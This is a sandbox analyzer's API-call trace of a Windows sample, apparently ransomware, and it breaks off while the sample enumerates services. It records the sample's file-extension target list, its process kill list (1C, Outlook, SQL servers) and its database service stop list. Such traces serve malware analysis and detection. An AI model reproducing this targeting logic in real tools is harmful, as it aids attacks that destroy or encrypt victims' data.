# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Mar 3 2020 14:14:30 # Log Creation Date: 03.04.2020 05:58:56.678 Process: id = "1" image_name = "wdgmug.exe" filename = "c:\\users\\fd1hvy\\desktop\\wdgmug.exe" page_root = "0x5b9c7000" os_pid = "0x1260" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x560" cmd_line = "\"C:\\Users\\FD1HVy\\Desktop\\wdgmug.exe\" " cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x1274 [0119.481] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x772d0000 [0119.481] GetProcAddress (hModule=0x772d0000, lpProcName="GetProcAddress") returned 0x772e51b0 [0119.482] GetProcAddress (hModule=0x772d0000, lpProcName="GetModuleHandleW") returned 0x772e50d0 [0119.482] GetProcAddress (hModule=0x772d0000, lpProcName="FindNextFileW") returned 0x7733ee40 [0119.482] GetProcAddress (hModule=0x772d0000, lpProcName="FindClose") returned 0x7733ed70 [0119.482] GetProcAddress (hModule=0x772d0000, lpProcName="MoveFileW") returned 0x7731e500 [0119.482] GetProcAddress (hModule=0x772d0000, lpProcName="GetFileSizeEx") returned 0x7733ef40 [0119.482] GetProcAddress (hModule=0x772d0000, lpProcName="GetModuleFileNameW") returned 0x772e5090 [0119.482] GetProcAddress (hModule=0x772d0000, lpProcName="GetFileAttributesW") returned 0x7733ef10 [0119.482] GetProcAddress (hModule=0x772d0000, lpProcName="ExitProcess") returned 0x772e3cb0 [0119.482] GetProcAddress (hModule=0x772d0000, lpProcName="GetCommandLineW") returned 0x772e4cc0 [0119.482] GetProcAddress (hModule=0x772d0000, lpProcName="GetComputerNameW") returned 0x773132c0 [0119.482] GetProcAddress (hModule=0x772d0000, lpProcName="GetComputerNameA") returned 0x77313780 [0119.482] GetProcAddress (hModule=0x772d0000, lpProcName="CreateMutexW") returned 0x7733eb70 [0119.482] GetProcAddress (hModule=0x772d0000, lpProcName="lstrlenW") returned 0x772e6c70 [0119.482] GetProcAddress (hModule=0x772d0000, lpProcName="lstrlenA") returned 0x772e6c50 [0119.482] GetProcAddress (hModule=0x772d0000, lpProcName="GetCurrentProcess") returned 0x7733ea10 [0119.482] GetProcAddress (hModule=0x772d0000, lpProcName="WaitForSingleObject") returned 0x7733eca0 [0119.482] GetProcAddress (hModule=0x772d0000, lpProcName="GetLogicalDrives") returned 0x772e0d20 [0119.482] GetProcAddress (hModule=0x772d0000, lpProcName="GetTickCount") returned 0x7733dd50 [0119.482] GetProcAddress (hModule=0x772d0000, lpProcName="DeleteFileW") returned 0x7733ed40 [0119.483] GetProcAddress (hModule=0x772d0000, lpProcName="WideCharToMultiByte") returned 0x772e6b10 [0119.483] GetProcAddress (hModule=0x772d0000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x7733ebb0 [0119.483] GetProcAddress (hModule=0x772d0000, lpProcName="Sleep") returned 0x772e6760 [0119.483] GetProcAddress (hModule=0x772d0000, lpProcName="LeaveCriticalSection") returned 0x779bb250 [0119.483] GetProcAddress (hModule=0x772d0000, lpProcName="ReadFile") returned 0x7733f090 [0119.483] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0119.483] GetProcAddress (hModule=0x772d0000, lpProcName="OpenMutexW") returned 0x7733ebf0 [0119.483] GetProcAddress (hModule=0x772d0000, lpProcName="EnterCriticalSection") returned 0x779bb2d0 [0119.483] GetProcAddress (hModule=0x772d0000, lpProcName="WaitForMultipleObjects") returned 0x7733ec80 [0119.483] GetProcAddress (hModule=0x772d0000, lpProcName="lstrcmpiW") returned 0x772e6bf0 [0119.483] GetProcAddress (hModule=0x772d0000, lpProcName="lstrcmpiA") returned 0x772e6bd0 [0119.483] GetProcAddress (hModule=0x772d0000, lpProcName="DeleteCriticalSection") returned 0x7799fb90 [0119.483] GetProcAddress (hModule=0x772d0000, lpProcName="ReleaseMutex") returned 0x7733ec20 [0119.483] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0119.484] GetProcAddress (hModule=0x772d0000, lpProcName="GetVersion") returned 0x772e56c0 [0119.484] GetProcAddress (hModule=0x772d0000, lpProcName="CreateThread") returned 0x772e46b0 [0119.484] GetProcAddress (hModule=0x772d0000, lpProcName="ExpandEnvironmentStringsW") returned 0x772e4a40 [0119.484] GetProcAddress (hModule=0x772d0000, lpProcName="QueryPerformanceCounter") returned 0x772e5da0 [0119.484] GetProcAddress (hModule=0x772d0000, lpProcName="QueryPerformanceFrequency") returned 0x772e5dc0 [0119.484] GetProcAddress (hModule=0x772d0000, lpProcName="GetCurrentProcessId") returned 0x7733ea20 [0119.484] GetProcAddress (hModule=0x772d0000, lpProcName="SetFileAttributesW") returned 0x7733f100 [0119.484] GetProcAddress (hModule=0x772d0000, lpProcName="GetVolumeInformationW") returned 0x7733f020 [0119.484] GetProcAddress (hModule=0x772d0000, lpProcName="WriteFile") returned 0x7733f180 [0119.484] GetProcAddress (hModule=0x772d0000, lpProcName="SetFilePointerEx") returned 0x7733f130 [0119.484] GetProcAddress (hModule=0x772d0000, lpProcName="SetEndOfFile") returned 0x7733f0e0 [0119.484] GetProcAddress (hModule=0x772d0000, lpProcName="FindFirstFileW") returned 0x7733edf0 [0119.484] GetProcAddress (hModule=0x772d0000, lpProcName="GetProcessHeap") returned 0x772e51f0 [0119.484] GetProcAddress (hModule=0x772d0000, lpProcName="HeapReAlloc") returned 0x779af630 [0119.484] GetProcAddress (hModule=0x772d0000, lpProcName="HeapAlloc") returned 0x779b2dc0 [0119.484] GetProcAddress (hModule=0x772d0000, lpProcName="HeapFree") returned 0x772e57f0 [0119.484] GetProcAddress (hModule=0x772d0000, lpProcName="CreatePipe") returned 0x772e4590 [0119.484] GetProcAddress (hModule=0x772d0000, lpProcName="SetHandleInformation") returned 0x7733eae0 [0119.485] GetProcAddress (hModule=0x772d0000, lpProcName="CreateProcessW") returned 0x772e4610 [0119.485] GetProcAddress (hModule=0x772d0000, lpProcName="CompareStringW") returned 0x772e4430 [0119.485] GetProcAddress (hModule=0x772d0000, lpProcName="CompareStringA") returned 0x772e4410 [0119.485] GetProcAddress (hModule=0x772d0000, lpProcName="OpenProcess") returned 0x772e5cc0 [0119.485] GetProcAddress (hModule=0x772d0000, lpProcName="TerminateProcess") returned 0x772e67e0 [0119.485] GetProcAddress (hModule=0x772d0000, lpProcName="GetSystemTime") returned 0x772e54e0 [0119.485] GetProcAddress (hModule=0x772d0000, lpProcName="SystemTimeToFileTime") returned 0x772e67a0 [0119.485] GetProcAddress (hModule=0x772d0000, lpProcName="GetLastError") returned 0x772e5010 [0119.485] GetProcAddress (hModule=0x772d0000, lpProcName="CreateToolhelp32Snapshot") returned 0x7731edc0 [0119.485] GetProcAddress (hModule=0x772d0000, lpProcName="Process32NextW") returned 0x7731f8f0 [0119.485] GetProcAddress (hModule=0x772d0000, lpProcName="Process32FirstW") returned 0x7731f750 [0119.485] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x756e0000 [0126.376] GetProcAddress (hModule=0x756e0000, lpProcName="RegOpenKeyExW") returned 0x756fe580 [0126.376] GetProcAddress (hModule=0x756e0000, lpProcName="RegQueryValueExW") returned 0x756fe5a0 [0126.376] GetProcAddress (hModule=0x756e0000, lpProcName="RegSetValueExW") returned 0x756ff530 [0126.376] GetProcAddress (hModule=0x756e0000, lpProcName="RegCloseKey") returned 0x756fed60 [0126.376] GetProcAddress (hModule=0x756e0000, lpProcName="OpenProcessToken") returned 0x756fefb0 [0126.376] GetProcAddress (hModule=0x756e0000, lpProcName="GetTokenInformation") returned 0x756fee90 [0126.376] GetProcAddress (hModule=0x756e0000, lpProcName="OpenSCManagerW") returned 0x75700540 [0126.376] GetProcAddress (hModule=0x756e0000, lpProcName="OpenServiceW") returned 0x756ffa20 [0126.377] GetProcAddress (hModule=0x756e0000, lpProcName="CloseServiceHandle") returned 0x756ffc00 [0126.377] GetProcAddress (hModule=0x756e0000, lpProcName="ControlService") returned 0x757126d0 [0126.377] GetProcAddress (hModule=0x756e0000, lpProcName="QueryServiceStatus") returned 0x75702380 [0126.377] GetProcAddress (hModule=0x756e0000, lpProcName="EnumDependentServicesW") returned 0x75712f70 [0126.377] GetProcAddress (hModule=0x756e0000, lpProcName="EnumServicesStatusExW") returned 0x756ffc80 [0126.377] LoadLibraryA (lpLibFileName="user32.dll") returned 0x750c0000 [0133.601] GetProcAddress (hModule=0x750c0000, lpProcName="SystemParametersInfoW") returned 0x750ef210 [0133.601] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x75760000 [0155.478] GetProcAddress (hModule=0x75760000, lpProcName="ShellExecuteExW") returned 0x758c4730 [0155.479] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77970000 [0155.479] GetProcAddress (hModule=0x77970000, lpProcName="NtQuerySystemInformation") returned 0x779e2070 [0155.479] LoadLibraryA (lpLibFileName="mpr.dll") returned 0x742c0000 [0155.881] GetProcAddress (hModule=0x742c0000, lpProcName="WNetCloseEnum") returned 0x742c2640 [0155.881] GetProcAddress (hModule=0x742c0000, lpProcName="WNetOpenEnumW") returned 0x742c2790 [0155.881] GetProcAddress (hModule=0x742c0000, lpProcName="WNetEnumResourceW") returned 0x742c2410 [0155.881] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x754f0000 [0156.530] GetProcAddress (hModule=0x754f0000, lpProcName="WSAStartup") returned 0x754f5b40 [0156.531] GetProcAddress (hModule=0x754f0000, lpProcName="socket") returned 0x75504510 [0156.531] GetProcAddress (hModule=0x754f0000, lpProcName="send") returned 0x754f5030 [0156.531] GetProcAddress (hModule=0x754f0000, lpProcName="recv") returned 0x75500c50 [0156.531] GetProcAddress (hModule=0x754f0000, lpProcName="connect") returned 0x754f5410 [0156.531] GetProcAddress (hModule=0x754f0000, lpProcName="closesocket") returned 0x75500910 [0156.531] GetProcAddress (hModule=0x754f0000, lpProcName="gethostbyname") returned 0x75526cb0 [0156.531] GetProcAddress (hModule=0x754f0000, lpProcName="inet_addr") returned 0x75509160 [0156.531] GetProcAddress (hModule=0x754f0000, lpProcName="ntohl") returned 0x754f49d0 [0156.531] GetProcAddress (hModule=0x754f0000, lpProcName="htonl") returned 0x754f49d0 [0156.531] GetProcAddress (hModule=0x754f0000, lpProcName="htons") returned 0x75508ff0 [0156.531] GetProcessHeap () returned 0x710000 [0156.532] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x20) returned 0x71ad60 [0156.532] QueryPerformanceCounter (in: lpPerformanceCount=0x19fdb0 | out: lpPerformanceCount=0x19fdb0*=25153276062) returned 1 [0156.532] GetTickCount () returned 0x1167eec [0156.532] GetCurrentProcessId () returned 0x1260 [0156.533] GetTickCount () returned 0x1167eec [0156.533] GetTickCount () returned 0x1167eec [0156.533] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x20) returned 0x71ae00 [0156.533] GetVersion () returned 0x23f00206 [0156.533] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x7) returned 0x726dd0 [0156.534] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x7276c8 [0156.534] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x7276c8, Size=0x20) returned 0x71ae28 [0156.534] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x71ae28, Size=0x40) returned 0x72a228 [0156.534] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x72e760 [0156.534] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_2KXQ81A") returned 0x0 [0156.534] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\syncronize_2KXQ81A") returned 0x1ec [0156.534] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x726dd0 | out: hHeap=0x710000) returned 1 [0156.534] lstrlenW (lpString="Global\\syncronize_") returned 18 [0156.534] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x72a228 | out: hHeap=0x710000) returned 1 [0156.534] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x7) returned 0x726d70 [0156.534] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x7276c8 [0156.535] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x7276c8, Size=0x20) returned 0x71ae28 [0156.535] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x71ae28, Size=0x40) returned 0x72a228 [0156.535] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x73e768 [0156.535] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_2KXQ81U") returned 0x0 [0156.535] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\syncronize_2KXQ81U") returned 0x1f0 [0156.535] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x726d70 | out: hHeap=0x710000) returned 1 [0156.535] lstrlenW (lpString="Global\\syncronize_") returned 18 [0156.535] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x72a228 | out: hHeap=0x710000) returned 1 [0156.535] GetVersion () returned 0x23f00206 [0156.535] GetCurrentProcess () returned 0xffffffff [0156.535] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19fd9c | out: TokenHandle=0x19fd9c*=0x1f4) returned 1 [0156.535] GetTokenInformation (in: TokenHandle=0x1f4, TokenInformationClass=0x14, TokenInformation=0x19fd98, TokenInformationLength=0x4, ReturnLength=0x19fda4 | out: TokenInformation=0x19fd98, ReturnLength=0x19fda4) returned 1 [0156.535] CloseHandle (hObject=0x1f4) returned 1 [0156.536] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x0) returned 0x0 [0156.536] WaitForSingleObject (hHandle=0x1ec, dwMilliseconds=0x3e8) returned 0x0 [0156.536] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x14) returned 0x725670 [0156.536] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x727728 [0156.536] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x727728, Size=0x20) returned 0x71ae28 [0156.536] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x71ae28, Size=0x40) returned 0x72a4b0 [0156.536] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x72a4b0, Size=0x80) returned 0x7223b8 [0156.536] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x7223b8, Size=0x100) returned 0x727358 [0156.536] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x34) returned 0x729698 [0156.536] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x4) returned 0x726ea0 [0156.536] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x4) returned 0x726dd0 [0156.536] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x8) returned 0x726d20 [0156.536] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x727590 [0156.536] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x4) returned 0x726d90 [0156.536] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7276e0 [0156.536] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x726d90, Size=0x8) returned 0x726df0 [0156.536] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x727728 [0156.536] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x726df0, Size=0x10) returned 0x727530 [0156.536] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7275f0 [0156.536] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7274b8 [0156.536] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x727530, Size=0x20) returned 0x71ae28 [0156.536] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x7274d0 [0156.536] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x727518 [0156.536] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x726ea0, Size=0x8) returned 0x726d30 [0156.537] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x726dd0, Size=0x8) returned 0x726df0 [0156.537] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x8) returned 0x726ea0 [0156.537] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x727530 [0156.537] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x4) returned 0x726e00 [0156.537] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x727548 [0156.537] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x726e00, Size=0x8) returned 0x726d50 [0156.537] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7276c8 [0156.537] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x726d50, Size=0x10) returned 0x727758 [0156.537] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x727740 [0156.537] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x8) returned 0x726e00 [0156.538] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x727758, Size=0x20) returned 0x74eb38 [0156.538] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x726d30, Size=0x10) returned 0x727758 [0156.538] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x726df0, Size=0x10) returned 0x727638 [0156.538] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x8) returned 0x726dc0 [0156.538] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x727578 [0156.538] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x4) returned 0x726d30 [0156.538] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x7275a8 [0156.538] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x726d30, Size=0x8) returned 0x726d70 [0156.538] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x8) returned 0x726d30 [0156.538] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x727650 [0156.538] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x4) returned 0x726d50 [0156.538] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x727668 [0156.538] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x726d50, Size=0x8) returned 0x726d90 [0156.538] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x727758, Size=0x20) returned 0x74e980 [0156.538] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x727638, Size=0x20) returned 0x74e818 [0156.538] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x8) returned 0x726dd0 [0156.538] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x727638 [0156.538] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x4) returned 0x726d50 [0156.538] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xa) returned 0x727758 [0156.538] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x726d50, Size=0x8) returned 0x726df0 [0156.538] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x14) returned 0x725690 [0156.538] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x14) returned 0x725710 [0156.539] lstrlenW (lpString="doc(.doc;.docx;.pdf;.xls;.xlsx;.ppt;)arc(.zip;.rar;.bz2;.7z;)dbf(.dbf;)1c8(.1cd;)jpg(.jpg;)") returned 91 [0156.539] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x727358 | out: hHeap=0x710000) returned 1 [0156.539] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x19fde8 | out: lpWSAData=0x19fde8) returned 0 [0156.544] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x727698 [0156.544] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x727698, Size=0x20) returned 0x74ec00 [0156.544] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x74ec00, Size=0x40) returned 0x72a588 [0156.544] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x72a588, Size=0x80) returned 0x727d68 [0156.544] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x727d68, Size=0x100) returned 0x727358 [0156.544] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x727698 [0156.544] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x727698, Size=0x20) returned 0x74e8b8 [0156.544] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x74e8b8, Size=0x40) returned 0x72a660 [0156.544] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x72a660, Size=0x80) returned 0x754380 [0156.544] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x754380, Size=0x100) returned 0x755030 [0156.544] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x727698 [0156.544] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x4) returned 0x753210 [0156.544] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x755318 [0156.544] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x753210, Size=0x8) returned 0x753330 [0156.544] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x14) returned 0x7257f0 [0156.544] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x753330, Size=0x10) returned 0x755330 [0156.544] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x18) returned 0x725510 [0156.544] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x1a) returned 0x74ea70 [0156.544] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x755330, Size=0x20) returned 0x74ebb0 [0156.544] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x1c) returned 0x74ec00 [0156.544] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x16) returned 0x725530 [0156.544] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x1a) returned 0x74e9f8 [0156.544] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x755258 [0156.544] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x4) returned 0x753300 [0156.544] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x40) returned 0x72a660 [0156.544] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x753300, Size=0x8) returned 0x753310 [0156.544] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x3c) returned 0x72a150 [0156.544] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x753310, Size=0x10) returned 0x755198 [0156.545] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x14) returned 0x7256b0 [0156.545] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x18) returned 0x725590 [0156.545] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x755198, Size=0x20) returned 0x74e840 [0156.545] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x24) returned 0x726228 [0156.545] lstrlenW (lpString="1c8.exe;1cv77.exe;outlook.exe;postgres.exe;mysqld-nt.exe;mysqld.exe;sqlservr.exe;") returned 81 [0156.545] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x727358 | out: hHeap=0x710000) returned 1 [0156.545] lstrlenW (lpString="FirebirdGuardianDefaultInstance;FirebirdServerDefaultInstance;sqlwriter;mssqlserver;sqlserveradhelper;") returned 102 [0156.545] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x755030 | out: hHeap=0x710000) returned 1 [0156.545] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x74e868 [0156.550] EnumServicesStatusExW (in: hSCManager=0x74e868, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x19fd84, lpServicesReturned=0x19fd9c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x19fd84, lpServicesReturned=0x19fd9c, lpResumeHandle=0x0) returned 0 [0156.551] GetLastError () returned 0xea [0156.551] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x1e90) returned 0x757728 [0156.551] EnumServicesStatusExW (in: hSCManager=0x74e868, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x757728, cbBufSize=0x1e90, pcbBytesNeeded=0x19fd84, lpServicesReturned=0x19fd9c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x757728, pcbBytesNeeded=0x19fd84, lpServicesReturned=0x19fd9c, lpResumeHandle=0x0) returned 1 [0156.553] CloseServiceHandle (hSCObject=0x74e868) returned 1 [0156.553] lstrlenW (lpString="Appinfo") returned 7 [0156.553] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0156.556] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0156.556] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0156.556] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0156.556] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0156.556] lstrlenW (lpString="AppXSvc") returned 7 [0156.556] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0156.556] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0156.556] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0156.556] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0156.556] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0156.556] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0156.556] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0156.556] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0156.556] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0156.556] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0156.556] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0156.556] lstrlenW (lpString="Audiosrv") returned 8 [0156.556] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0156.556] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0156.556] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0156.556] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0156.556] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0156.556] lstrlenW (lpString="BFE") returned 3 [0156.556] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0156.556] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0156.556] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0156.556] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0156.556] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0156.556] lstrlenW (lpString="BITS") returned 4 [0156.556] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0156.556] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0156.556] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0156.557] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0156.557] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0156.557] 